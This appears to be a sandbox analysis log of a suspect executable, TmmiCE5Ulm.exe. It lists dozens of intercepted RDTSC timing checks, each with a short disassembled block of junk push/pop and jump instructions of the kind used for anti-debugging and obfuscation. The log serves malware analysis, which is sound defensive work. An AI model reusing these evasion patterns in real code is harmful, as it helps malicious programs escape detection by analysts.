Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8F1DED second address: 8F1E3F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jne 00007F05F0F49756h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov dword ptr [ebp+12451DD4h], ebx 0x00000013 lea eax, dword ptr [ebp+1247C75Ch] 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007F05F0F49758h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 0000001Ch 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 add edi, dword ptr [ebp+122D2FC1h] 0x00000039 push eax 0x0000003a jl 00007F05F0F49768h 0x00000040 push eax 0x00000041 push edx 0x00000042 jo 00007F05F0F49756h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9348AE second address: 9348BA instructions: 0x00000000 rdtsc 0x00000002 jo 00007F05F0F59496h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9348BA second address: 9348D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05F0F49765h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 934A59 second address: 934A5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 934A5D second address: 934A63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 934A63 second address: 934A67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 934F44 second address: 934F68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F4975Eh 0x00000007 jmp 00007F05F0F49762h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 934F68 second address: 934F6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 934F6D second address: 934F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05F0F49766h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 93FE4B second address: 93FE51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 93FE51 second address: 93FE56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 93FE56 second address: 93FE7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F5949Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F05F0F594A5h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 93FFF3 second address: 940002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F05F0F49756h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 942B36 second address: 942B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8B3F68 second address: 8B3F80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F05F0F49756h 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jl 00007F05F0F49756h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 946D15 second address: 946D33 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F05F0F59496h 0x00000008 jmp 00007F05F0F594A4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 94708F second address: 947095 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 947333 second address: 94733C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9474FC second address: 947500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 94D838 second address: 94D83C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 94D83C second address: 94D85E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007F05F0F49764h 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 94D85E second address: 94D862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 94D862 second address: 94D889 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F4975Fh 0x00000007 jmp 00007F05F0F4975Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push edi 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 94C10A second address: 94C10F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 94C3EE second address: 94C415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 jmp 00007F05F0F49767h 0x0000000a pop edx 0x0000000b pop ebx 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007F05F0F49756h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 94C415 second address: 94C419 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 94C419 second address: 94C437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F05F0F49763h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 94C6B8 second address: 94C6BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8F164A second address: 8F164E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8F164E second address: 8F1652 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8F1652 second address: 8F1658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8F1658 second address: 8F1672 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05F0F594A6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 950A54 second address: 950A5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 950A5A second address: 950A5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 950392 second address: 9503C8 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F05F0F49756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F05F0F49767h 0x00000011 jmp 00007F05F0F49763h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9503C8 second address: 9503CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9580D8 second address: 9580DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9580DE second address: 9580EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 958F5A second address: 958F6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05F0F4975Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 95D2C4 second address: 95D2D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05F0F594A0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 95D588 second address: 95D597 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F4975Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 95D597 second address: 95D5C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F05F0F594A9h 0x0000000b popad 0x0000000c jc 00007F05F0F594A6h 0x00000012 push ecx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 pop ecx 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 95D87B second address: 95D891 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F05F0F4975Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 95D891 second address: 95D895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 95D895 second address: 95D899 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 95DC4B second address: 95DC51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 95DC51 second address: 95DC72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007F05F0F49756h 0x00000010 jmp 00007F05F0F49761h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 95DC72 second address: 95DC90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F594A8h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 95DC90 second address: 95DC96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 95DC96 second address: 95DCA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F05F0F59496h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 95DCA0 second address: 95DCAA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F05F0F49756h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 95DCAA second address: 95DCD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F05F0F594A8h 0x0000000c jmp 00007F05F0F5949Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 95DE53 second address: 95DE58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 969D24 second address: 969D29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 96A546 second address: 96A554 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05F0F4975Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 96AA9E second address: 96AABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05F0F594A7h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 96AABA second address: 96AABF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 96AABF second address: 96AAFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05F0F594A9h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F05F0F594A3h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 jl 00007F05F0F59496h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 972226 second address: 97222A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 97237D second address: 972396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007F05F0F594A0h 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 972396 second address: 9723AB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F05F0F49760h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9723AB second address: 9723C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F05F0F5949Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9723C1 second address: 9723C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9723C5 second address: 9723E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F5949Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9723E2 second address: 9723E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9723E8 second address: 9723EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9723EE second address: 9723F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 97FB7D second address: 97FB87 instructions: 0x00000000 rdtsc 0x00000002 je 00007F05F0F5949Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 97FB87 second address: 97FB93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 97FD34 second address: 97FD3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 97FD3A second address: 97FD50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F05F0F49756h 0x00000010 jbe 00007F05F0F49756h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 97FD50 second address: 97FD5A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F05F0F59496h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 97FD5A second address: 97FD60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9846E1 second address: 9846E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 991B8B second address: 991BB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F4975Fh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F05F0F49761h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 999E05 second address: 999E0F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F05F0F59496h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 999E0F second address: 999E1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 999E1A second address: 999E4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05F0F594A0h 0x00000009 popad 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F05F0F59498h 0x00000013 push ebx 0x00000014 jmp 00007F05F0F594A0h 0x00000019 pop ebx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 999E4C second address: 999E67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F49763h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 999F96 second address: 999FAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05F0F5949Eh 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 999FAC second address: 999FD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F05F0F49765h 0x0000000a jmp 00007F05F0F4975Bh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 999FD9 second address: 999FF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F05F0F5949Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 999FF0 second address: 999FF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 999FF4 second address: 999FFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 99A2E2 second address: 99A30D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 jnl 00007F05F0F4975Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F05F0F49764h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 99F7F4 second address: 99F7FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 99F7FE second address: 99F802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 99F802 second address: 99F806 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9A83A3 second address: 9A83A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9A83A9 second address: 9A83D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F594A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop esi 0x0000000d popad 0x0000000e jc 00007F05F0F594BAh 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9BF32D second address: 9BF33C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F05F0F49756h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9BF33C second address: 9BF35B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05F0F594A9h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9BF03E second address: 9BF048 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F05F0F4975Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9BF048 second address: 9BF062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F05F0F594A4h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 9D55DC second address: 9D55E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
